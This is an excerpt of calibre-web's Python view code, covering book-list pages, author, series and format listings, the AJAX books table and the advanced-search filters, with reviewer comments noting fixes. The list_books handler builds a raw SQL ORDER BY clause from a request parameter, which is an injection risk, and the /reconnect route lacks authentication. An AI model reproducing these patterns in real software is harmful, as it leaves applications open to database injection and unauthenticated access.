    return render_title_template('author.html', entries=entries, pagination=pagination, id=author_id,
                                 title=_(u"Author: %(name)s", name=author_name), author=author_info,
                                 other_books=other_books, page="author")
def render_publisher_books(page, book_id, order):
    """Render all books of the publisher *book_id*, grouped by series."""
    publisher = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == book_id).first()
    if publisher is None:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.publishers.any(db.Publishers.id == book_id),
        [db.Series.name, order[0], db.Books.series_index],
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 id=book_id, title=_(u"Publisher: %(name)s", name=publisher.name),
                                 page="publisher")
def render_series_books(page, book_id, order):
    """Render all books belonging to the series *book_id*."""
    series = calibre_db.session.query(db.Series).filter(db.Series.id == book_id).first()
    if series is None:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.series.any(db.Series.id == book_id),
        [order[0]])
    return render_title_template('index.html', random=random, pagination=pagination, entries=entries,
                                 id=book_id, title=_(u"Series: %(serie)s", serie=series.name),
                                 page="series")
def render_ratings_books(page, book_id, order):
    """Render all books carrying the rating identified by *book_id*.

    calibre stores ratings doubled (0-10); display divides by 2 for stars.
    """
    rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == book_id).first()
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.ratings.any(db.Ratings.id == book_id),
        [order[0]])
    if not (rating and rating.rating <= 10):
        abort(404)
    return render_title_template('index.html', random=random, pagination=pagination, entries=entries,
                                 id=book_id,
                                 title=_(u"Rating: %(rating)s stars", rating=int(rating.rating / 2)),
                                 page="ratings")
def render_formats_books(page, book_id, order):
    """Render all books available in the file format given by *book_id*."""
    fmt = calibre_db.session.query(db.Data).filter(db.Data.format == book_id.upper()).first()
    if fmt is None:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.data.any(db.Data.format == book_id.upper()),
        [order[0]])
    return render_title_template('index.html', random=random, pagination=pagination, entries=entries,
                                 id=book_id, title=_(u"File format: %(format)s", format=fmt.format),
                                 page="formats")
def render_category_books(page, book_id, order):
    """Render all books tagged with the category (tag) *book_id*."""
    tag = calibre_db.session.query(db.Tags).filter(db.Tags.id == book_id).first()
    if tag is None:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.tags.any(db.Tags.id == book_id),
        [order[0], db.Series.name, db.Books.series_index],
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 id=book_id, title=_(u"Category: %(name)s", name=tag.name),
                                 page="category")
def render_language_books(page, name, order):
    """Render all books in the language whose ISO code is *name*."""
    try:
        lang_name = isoLanguages.get_language_name(get_locale(), name)
    except KeyError:
        # Unknown language code -> not found.
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.languages.any(db.Languages.lang_code == name),
        [order[0]])
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 id=name, title=_(u"Language: %(name)s", name=lang_name),
                                 page="language")
def render_read_books(page, are_read, as_xml=False, order=None):
    """Render (or return raw, for OPDS) the user's read or unread books.

    The read state comes either from calibre-web's own ReadBook table or,
    when config_read_column is set, from a boolean custom column inside the
    calibre database itself.
    """
    order = order or []
    if not config.config_read_column:
        # Read state tracked in calibre-web's own database (per user).
        if are_read:
            db_filter = and_(ub.ReadBook.user_id == int(current_user.id),
                             ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
        else:
            db_filter = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
        entries, random, pagination = calibre_db.fill_indexpage(page, 0,
                                                                db.Books,
                                                                db_filter,
                                                                order,
                                                                db.books_series_link,
                                                                db.Books.id == db.books_series_link.c.book,
                                                                db.Series,
                                                                ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
    else:
        # Read state tracked in a calibre custom column (boolean).
        try:
            if are_read:
                db_filter = db.cc_classes[config.config_read_column].value == True
            else:
                db_filter = coalesce(db.cc_classes[config.config_read_column].value, False) != True
            entries, random, pagination = calibre_db.fill_indexpage(page, 0,
                                                                    db.Books,
                                                                    db_filter,
                                                                    order,
                                                                    db.books_series_link,
                                                                    db.Books.id == db.books_series_link.c.book,
                                                                    db.Series,
                                                                    db.cc_classes[config.config_read_column])
        except (KeyError, AttributeError):
            # Configured custom column does not exist (anymore).
            log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
            if not as_xml:
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return redirect(url_for("web.index"))
        # ToDo: Handle error Case for opds
        # NOTE(review): in the as_xml error case above, entries/pagination may
        # be unbound here and the return below would raise — confirm intended.
    if as_xml:
        return entries, pagination
    else:
        if are_read:
            name = _(u'Read Books') + ' (' + str(pagination.total_count) + ')'
            pagename = "read"
        else:
            name = _(u'Unread Books') + ' (' + str(pagination.total_count) + ')'
            pagename = "unread"
        return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                     title=name, page=pagename)
def render_archived_books(page, order):
    """Render the current user's archived books."""
    order = order or []
    archived_book_ids = [
        record.book_id
        for record in ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.user_id == int(current_user.id))
        .filter(ub.ArchivedBook.is_archived == True)
        .all()
    ]
    archived_filter = db.Books.id.in_(archived_book_ids)
    entries, random, pagination = calibre_db.fill_indexpage_with_archived_books(
        page, 0,
        db.Books,
        archived_filter,
        order,
        allow_show_archived=True)
    name = _(u'Archived Books') + ' (' + str(len(archived_book_ids)) + ')'
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 title=name, page="archived")
def render_prepare_search_form(cc):
    """Render the advanced-search form, pre-populated with all selectable values.

    *cc* is the list of calibre custom columns offered as extra criteria.
    Only tags/series/formats actually attached to visible books are listed.
    """
    # prepare data for search-form
    tags = calibre_db.session.query(db.Tags)\
        .join(db.books_tags_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_tags_link.tag'))\
        .order_by(db.Tags.name).all()
    # NOTE(review): common_filters() is applied twice on this series query;
    # harmless but redundant.
    series = calibre_db.session.query(db.Series)\
        .join(db.books_series_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_series_link.series'))\
        .order_by(db.Series.name)\
        .filter(calibre_db.common_filters()).all()
    # Public shelves plus the user's own shelves.
    shelves = ub.session.query(ub.Shelf)\
        .filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(current_user.id)))\
        .order_by(ub.Shelf.name).all()
    extensions = calibre_db.session.query(db.Data)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(db.Data.format)\
        .order_by(db.Data.format).all()
    if current_user.filter_language() == u"all":
        languages = calibre_db.speaking_language()
    else:
        # A fixed per-user language filter means no language selector is shown.
        languages = None
    return render_title_template('search_form.html', tags=tags, languages=languages, extensions=extensions,
                                 series=series,shelves=shelves, title=_(u"Advanced Search"), cc=cc, page="advsearch")
def render_search_results(term, offset=None, order=None, limit=None):
    """Render the simple full-text search result page for *term*."""
    entries, result_count, pagination = calibre_db.get_search_results(
        term, offset, order, limit,
        db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series)
    return render_title_template('search.html',
                                 searchterm=term,
                                 pagination=pagination,
                                 query=term,
                                 adv_searchterm=term,
                                 entries=entries,
                                 result_count=result_count,
                                 title=_(u"Search"),
                                 page="search")
# ################################### View Books list ##################################################################
@web.route("/", defaults={'page': 1})
@web.route('/page/<int:page>')
@login_required_if_no_ano
def index(page):
    """Front page: the 'newest' book list, honouring the 'sort' query argument."""
    requested_sort = request.args.get('sort') or 'stored'
    return render_books_list("newest", requested_sort.lower(), 1, page)
@web.route('/<data>/<sort_param>', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/<book_id>', defaults={'page': 1})
@web.route('/<data>/<sort_param>/<book_id>/<int:page>')
@login_required_if_no_ano
def books_list(data, sort_param, book_id, page):
    """Generic paged book list: *data* selects the view, *sort_param* the order."""
    return render_books_list(data, sort_param, book_id, page)
@web.route("/table")
@login_required
def books_table():
    """Render the editable books table view with the user's column visibility."""
    visibility = current_user.view_settings.get('table', {})
    # NOTE(review): the template keyword is spelled 'visiblility' — the template
    # presumably expects exactly this name; keep both in sync if ever renamed.
    return render_title_template('book_table.html', title=_(u"Books List"), page="book_table",
                                 visiblility=visibility)
@web.route("/ajax/listbooks")
@login_required
def list_books():
    """JSON backend for the books table (server-side paging for bootstrap-table).

    Supports paging (offset/limit), free-text search, per-column sorting and a
    'state' mode used to restore checkbox selections.
    """
    off = int(request.args.get("offset") or 0)
    limit = int(request.args.get("limit") or config.config_books_per_page)
    search = request.args.get("search")
    sort = request.args.get("sort", "id")
    order = request.args.get("order", "").lower()
    state = None
    join = tuple()
    # Map the requested sort column to an ORDER BY list plus the join chain
    # needed to make that column available.
    if sort == "state":
        state = json.loads(request.args.get("state", "[]"))
    elif sort == "tags":
        order = [db.Tags.name.asc()] if order == "asc" else [db.Tags.name.desc()]
        join = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
    elif sort == "series":
        order = [db.Series.name.asc()] if order == "asc" else [db.Series.name.desc()]
        join = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
    elif sort == "publishers":
        order = [db.Publishers.name.asc()] if order == "asc" else [db.Publishers.name.desc()]
        join = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
    elif sort == "authors":
        order = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if order == "asc" \
            else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
        join = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
               db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    elif sort == "languages":
        order = [db.Languages.lang_code.asc()] if order == "asc" else [db.Languages.lang_code.desc()]
        join = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
    elif order and sort in ["sort", "title", "authors_sort", "series_index"]:
        # Plain Books column: build a textual ORDER BY clause.
        order = [text(sort + " " + order)]
    elif not state:
        order = [db.Books.timestamp.desc()]
    total_count = filtered_count = calibre_db.session.query(db.Books).count()
    if state:
        if search:
            books = calibre_db.search_query(search).all()
            filtered_count = len(books)
        else:
            books = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
        entries = calibre_db.get_checkbox_sorted(books, state, off, limit, order)
    elif search:
        entries, filtered_count, __ = calibre_db.get_search_results(search, off, order, limit, *join)
    else:
        # NOTE(review): true division yields a float page number here;
        # presumably fill_indexpage tolerates it, but '//' looks intended.
        entries, __, __ = calibre_db.fill_indexpage((int(off) / (int(limit)) + 1), limit, db.Books, True, order, *join)
    for entry in entries:
        for index in range(0, len(entry.languages)):
            # Attach a human-readable language name for the table column.
            entry.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
                index].lang_code)
    table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": entries}
    js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
    response = make_response(js_list)
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@web.route("/ajax/table_settings", methods=['POST'])
@login_required
def update_table_settings():
    """Persist the posted column-visibility settings for the books table."""
    # vals = request.get_json()
    # ToDo: Save table settings
    current_user.view_settings['table'] = json.loads(request.data)
    try:
        try:
            # Anonymous user objects lack ORM change tracking.
            flag_modified(current_user, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        log.error("Invalid request received: %r ", request, )
        return "Invalid request", 400
    return ""
@web.route("/author")
@login_required_if_no_ano
def author_list():
    """List all authors with their book counts and an A-Z character index."""
    if not current_user.check_visibility(constants.SIDEBAR_AUTHOR):
        abort(404)
    if current_user.get_view_property('author', 'dir') == 'desc':
        order = db.Authors.sort.desc()
        order_no = 0
    else:
        order = db.Authors.sort.asc()
        order_no = 1
    entries = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
        .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(text('books_authors_link.author')).order_by(order).all()
    charlist = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
        .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
    # If not creating a copy, readonly databases can not display authornames
    # with "|" in it as changing the name starts a change session.
    autor_copy = copy.deepcopy(entries)
    for entry in autor_copy:
        entry.Authors.name = entry.Authors.name.replace('|', ',')
    # Consistency fix: wrap the page title in _() like every sibling list view,
    # so it gets translated.
    return render_title_template('list.html', entries=autor_copy, folder='web.books_list', charlist=charlist,
                                 title=_(u"Authors"), page="authorlist", data='author', order=order_no)
@web.route("/downloadlist")
@login_required_if_no_ano
def download_list():
    """List all users together with their download counts (admins only)."""
    if current_user.get_view_property('download', 'dir') == 'desc':
        order, order_no = ub.User.name.desc(), 0
    else:
        order, order_no = ub.User.name.asc(), 1
    if not (current_user.check_visibility(constants.SIDEBAR_DOWNLOAD) and current_user.role_admin()):
        abort(404)
    entries = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count')) \
        .join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(order).all()
    # First characters of user names for the A-Z index, anonymous users excluded.
    charlist = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
        .filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
        .group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
    return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                 title=_(u"Downloads"), page="downloadlist", data="download", order=order_no)
@web.route("/publisher")
@login_required_if_no_ano
def publisher_list():
    """List all publishers with book counts and an A-Z character index."""
    if current_user.get_view_property('publisher', 'dir') == 'desc':
        order, order_no = db.Publishers.name.desc(), 0
    else:
        order, order_no = db.Publishers.name.asc(), 1
    if not current_user.check_visibility(constants.SIDEBAR_PUBLISHER):
        abort(404)
    entries = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
        .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(text('books_publishers_link.publisher')).order_by(order).all()
    charlist = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
        .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
    return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                 title=_(u"Publishers"), page="publisherlist", data="publisher", order=order_no)
@web.route("/series")
@login_required_if_no_ano
def series_list():
    """List all series, either as a flat list or as a cover grid.

    The user's 'series_view' view property selects between the two layouts.
    """
    if current_user.check_visibility(constants.SIDEBAR_SERIES):
        if current_user.get_view_property('series', 'dir') == 'desc':
            order = db.Series.sort.desc()
            order_no = 0
        else:
            order = db.Series.sort.asc()
            order_no = 1
        if current_user.get_view_property('series', 'series_view') == 'list':
            entries = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(order).all()
            charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                         title=_(u"Series"), page="serieslist", data="series")
        else:
            # Grid view: one representative Books row per series for cover display.
            entries = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
                .join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(order).all()
            charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            return render_title_template('grid.html', entries=entries, folder='web.books_list', charlist=charlist,
                                         title=_(u"Series"), page="serieslist", data="series", bodyClass="grid-view",
                                         order=order_no)
    else:
        abort(404)
@web.route("/ratings")
@login_required_if_no_ano
def ratings_list():
    """List all ratings (as star values) together with their book counts."""
    if not current_user.check_visibility(constants.SIDEBAR_RATING):
        abort(404)
    if current_user.get_view_property('ratings', 'dir') == 'desc':
        order, order_no = db.Ratings.rating.desc(), 0
    else:
        order, order_no = db.Ratings.rating.asc(), 1
    # calibre stores ratings doubled (0-10); divide by 2 for display stars.
    entries = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
                                       (db.Ratings.rating / 2).label('name')) \
        .join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(text('books_ratings_link.rating')).order_by(order).all()
    return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
                                 title=_(u"Ratings list"), page="ratingslist", data="ratings", order=order_no)
@web.route("/formats")
@login_required_if_no_ano
def formats_list():
    """List all file formats present in the library with their book counts."""
    if not current_user.check_visibility(constants.SIDEBAR_FORMAT):
        abort(404)
    # Bugfix: the sort direction was read from the 'ratings' view property
    # (copy-paste from ratings_list); use this page's own 'formats' key so the
    # user's chosen direction for the formats list is actually honoured.
    if current_user.get_view_property('formats', 'dir') == 'desc':
        order = db.Data.format.desc()
        order_no = 0
    else:
        order = db.Data.format.asc()
        order_no = 1
    entries = calibre_db.session.query(db.Data,
                                       func.count('data.book').label('count'),
                                       db.Data.format.label('format')) \
        .join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(db.Data.format).order_by(order).all()
    return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
                                 title=_(u"File formats list"), page="formatslist", data="formats", order=order_no)
@web.route("/language")
@login_required_if_no_ano
def language_overview():
    """Show all languages present in the library with per-language book counts."""
    if not current_user.check_visibility(constants.SIDEBAR_LANGUAGE):
        abort(404)
    charlist = list()
    if current_user.filter_language() == u"all":
        languages = calibre_db.speaking_language()
        # ToDo: generate first character list for languages
    else:
        # The user is restricted to a single language; show only that one.
        languages = calibre_db.session.query(db.Languages).filter(
            db.Languages.lang_code == current_user.filter_language()).all()
        # Bugfix: look up the display name from the row's lang_code column.
        # The Languages row has no 'name' attribute before this assignment,
        # so the previous 'languages[0].name.lang_code' raised AttributeError.
        languages[0].name = isoLanguages.get_language_name(get_locale(), languages[0].lang_code)
    lang_counter = calibre_db.session.query(db.books_languages_link,
                                            func.count('books_languages_link.book').label('bookcount')).group_by(
        text('books_languages_link.lang_code')).all()
    return render_title_template('languages.html', languages=languages, lang_counter=lang_counter,
                                 charlist=charlist, title=_(u"Languages"), page="langlist",
                                 data="language")
@web.route("/category")
@login_required_if_no_ano
def category_list():
    """List all tags (categories) with book counts and an A-Z character index."""
    if not current_user.check_visibility(constants.SIDEBAR_CATEGORY):
        abort(404)
    if current_user.get_view_property('category', 'dir') == 'desc':
        order, order_no = db.Tags.name.desc(), 0
    else:
        order, order_no = db.Tags.name.asc(), 1
    entries = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
        .join(db.books_tags_link).join(db.Books).order_by(order).filter(calibre_db.common_filters()) \
        .group_by(text('books_tags_link.tag')).all()
    charlist = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
        .join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
    return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                 title=_(u"Categories"), page="catlist", data="category", order=order_no)
# ################################### Task functions ################################################################
@web.route("/tasks")
@login_required
def get_tasks_status():
    """Show the background task list."""
    # if current user admin, show all email, otherwise only own emails
    answer = render_task_status(WorkerThread.getInstance().tasks)
    return render_title_template('tasks.html', entries=answer, title=_(u"Tasks"), page="tasks")
@app.route("/reconnect")
def reconnect():
    """Force a reconnect to the calibre database (after external changes).

    NOTE(review): this route is registered on the app without any login
    decorator, so it appears reachable unauthenticated — confirm intended.
    """
    calibre_db.reconnect_db(config, ub.app_DB_path)
    return json.dumps({})
# ################################### Search functions ################################################################
@web.route("/search", methods=["GET"])
@login_required_if_no_ano
def search():
    """Plain search entry point; redirects to the paged result list."""
    term = request.args.get("query")
    if not term:
        # Empty query: show the empty search page instead of redirecting.
        return render_title_template('search.html',
                                     searchterm="",
                                     result_count=0,
                                     title=_(u"Search"),
                                     page="search")
    return redirect(url_for('web.books_list', data="search", sort_param='stored', query=term))
@web.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def advanced_search():
    """Store the posted advanced-search form in the session and redirect to results."""
    values = dict(request.form)
    # Multi-select fields need getlist(); dict(request.form) keeps only one value.
    multi_selects = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie',
                     'include_shelf', 'exclude_shelf', 'include_language', 'exclude_language',
                     'include_extension', 'exclude_extension']
    for key in multi_selects:
        values[key] = list(request.form.getlist(key))
    flask_session['query'] = json.dumps(values)
    return redirect(url_for('web.books_list', data="advsearch", sort_param='stored', query=""))
def adv_search_custom_columns(cc, term, q):
    """Apply the advanced-search criteria for calibre custom columns to *q*.

    *cc* is the list of custom-column definitions, *term* the posted form
    values. Returns the narrowed query.
    """
    for c in cc:
        if c.datatype == "datetime":
            # Date columns come as a start/end pair of form fields.
            custom_start = term.get('custom_column_' + str(c.id) + '_start')
            custom_end = term.get('custom_column_' + str(c.id) + '_end')
            if custom_start:
                q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) >= func.datetime(custom_start)))
            if custom_end:
                q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) <= func.datetime(custom_end)))
        else:
            custom_query = term.get('custom_column_' + str(c.id))
            if custom_query != '' and custom_query is not None:
                if c.datatype == 'bool':
                    q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == (custom_query == "True")))
                elif c.datatype == 'int' or c.datatype == 'float':
                    q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == custom_query))
                elif c.datatype == 'rating':
                    # Form ratings are 0-5 stars; the calibre db stores 0-10.
                    q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == int(float(custom_query) * 2)))
                else:
                    # Text-like columns: case-insensitive substring match.
                    q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        func.lower(db.cc_classes[c.id].value).ilike("%" + custom_query + "%")))
    return q
def adv_search_language(q, include_languages_inputs, exclude_languages_inputs):
    """Apply the advanced-search language include/exclude filters to *q*.

    A fixed per-user language filter overrides the form's selections
    entirely. Returns the narrowed query.
    """
    if current_user.filter_language() != "all":
        q = q.filter(db.Books.languages.any(db.Languages.lang_code == current_user.filter_language()))
    else:
        for language in include_languages_inputs:
            q = q.filter(db.Books.languages.any(db.Languages.id == language))
        for language in exclude_languages_inputs:
            # Bugfix: the exclusion previously tested db.Books.series against a
            # Languages id, which never matched anything; filter the languages
            # relationship instead, mirroring the include branch above.
            q = q.filter(not_(db.Books.languages.any(db.Languages.id == language)))
    return q
def adv_search_ratings(q, rating_high, rating_low):
    """Constrain *q* to the rating range from the advanced-search form.

    Form ratings are 0-5 stars; the calibre db stores 0-10, hence the *2.
    """
    if rating_high:
        q = q.filter(db.Books.ratings.any(db.Ratings.rating <= int(rating_high) * 2))
    if rating_low:
        q = q.filter(db.Books.ratings.any(db.Ratings.rating >= int(rating_low) * 2))
    return q
def adv_search_read_status(q, read_status):
    """Filter the advanced-search query by read/unread state.

    Uses the configured calibre custom column when set, otherwise
    calibre-web's own ReadBook table for the current user. Returns the
    narrowed (or, on a missing custom column, unmodified) query.
    """
    if read_status:
        if config.config_read_column:
            try:
                if read_status == "True":
                    q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(db.cc_classes[config.config_read_column].value == True)
                else:
                    # coalesce: books with no column row count as unread.
                    q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
            except (KeyError, AttributeError):
                # Configured custom column no longer exists; warn and return unfiltered.
                log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return q
        else:
            if read_status == "True":
                q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(current_user.id),
                            ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
            else:
                q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(current_user.id),
                            coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
    return q
def adv_search_extension(q, include_extension_inputs, exclude_extension_inputs):
    """Restrict *q* by included/excluded file formats."""
    for fmt in include_extension_inputs:
        q = q.filter(db.Books.data.any(db.Data.format == fmt))
    for fmt in exclude_extension_inputs:
        q = q.filter(not_(db.Books.data.any(db.Data.format == fmt)))
    return q
def adv_search_tag(q, include_tag_inputs, exclude_tag_inputs):
    """Restrict *q* to books carrying all included tags and none of the excluded ones."""
    for tag_id in include_tag_inputs:
        q = q.filter(db.Books.tags.any(db.Tags.id == tag_id))
    for tag_id in exclude_tag_inputs:
        q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag_id)))
    return q
def adv_search_serie(q, include_series_inputs, exclude_series_inputs):
    """Restrict *q* to books in all included series and none of the excluded ones."""
    for series_id in include_series_inputs:
        q = q.filter(db.Books.series.any(db.Series.id == series_id))
    for series_id in exclude_series_inputs:
        q = q.filter(not_(db.Books.series.any(db.Series.id == series_id)))
    return q
def adv_search_shelf(q, include_shelf_inputs, exclude_shelf_inputs):
    """Filter *q* by shelf membership; books on excluded shelves are dropped."""
    # Outer join keeps books that are on no shelf at all (shelf IS NULL).
    q = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id) \
        .filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(exclude_shelf_inputs)))
    if include_shelf_inputs:
        q = q.filter(ub.BookShelf.shelf.in_(include_shelf_inputs))
    return q
def extend_search_term(searchterm,
                       author_name,
                       book_title,
                       publisher,
                       pub_start,
                       pub_end,
                       tags,
                       rating_high,
                       rating_low,
                       read_status,
                       ):
    """Build the human-readable description of an advanced search.

    Returns the joined search-term string plus the (possibly reset)
    publication start/end dates: a date that fails to parse is reset to ""
    so the caller does not filter on it.
    """
    searchterm.extend((author_name.replace('|', ','), book_title, publisher))
    if pub_start:
        try:
            searchterm.extend([_(u"Published after ") +
                               format_date(datetime.strptime(pub_start, "%Y-%m-%d"),
                                           format='medium', locale=get_locale())])
        except ValueError:
            pub_start = u""
    if pub_end:
        try:
            searchterm.extend([_(u"Published before ") +
                               format_date(datetime.strptime(pub_end, "%Y-%m-%d"),
                                           format='medium', locale=get_locale())])
        except ValueError:
            # Bugfix: this branch previously reset pub_start, leaving an
            # unparsable pub_end in effect (and clobbering a valid start date).
            pub_end = u""
    # Echo the names of all included/excluded tags, series and shelves.
    elements = {'tag': db.Tags, 'serie': db.Series, 'shelf': ub.Shelf}
    for key, db_element in elements.items():
        tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['include_' + key])).all()
        searchterm.extend(tag.name for tag in tag_names)
        tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['exclude_' + key])).all()
        searchterm.extend(tag.name for tag in tag_names)
    language_names = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(tags['include_language'])).all()
    if language_names:
        # Convert language rows to their localized display names.
        language_names = calibre_db.speaking_language(language_names)
    searchterm.extend(language.name for language in language_names)
    language_names = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(tags['exclude_language'])).all()
    if language_names:
        language_names = calibre_db.speaking_language(language_names)
    searchterm.extend(language.name for language in language_names)
    if rating_high:
        searchterm.extend([_(u"Rating <= %(rating)s", rating=rating_high)])
    if rating_low:
        searchterm.extend([_(u"Rating >= %(rating)s", rating=rating_low)])
    if read_status:
        searchterm.extend([_(u"Read Status = %(status)s", status=read_status)])
    searchterm.extend(ext for ext in tags['include_extension'])
    searchterm.extend(ext for ext in tags['exclude_extension'])
    # handle custom columns
    searchterm = " + ".join(filter(None, searchterm))
    return searchterm, pub_start, pub_end
def render_adv_search_results(term, offset=None, order=None, limit=None):
    # Execute the advanced search described by *term* (a dict of submitted
    # form fields) and render the paginated result page.
    #
    # term:   dict of criteria (author/title/publisher, date range, tag and
    #         language include/exclude lists, ratings, custom columns, ...)
    # offset: index of the first result to show; pagination only happens
    #         when both offset and limit are given
    # order:  list of SQLAlchemy order_by clauses (default: book sort)
    # limit:  page size
    order = order or [db.Books.sort]
    pagination = None
    cc = get_cc_columns(filter_config_custom_read=True)
    # Register lower() on the raw SQLite connection so case-insensitive
    # ilike() comparisons below work.
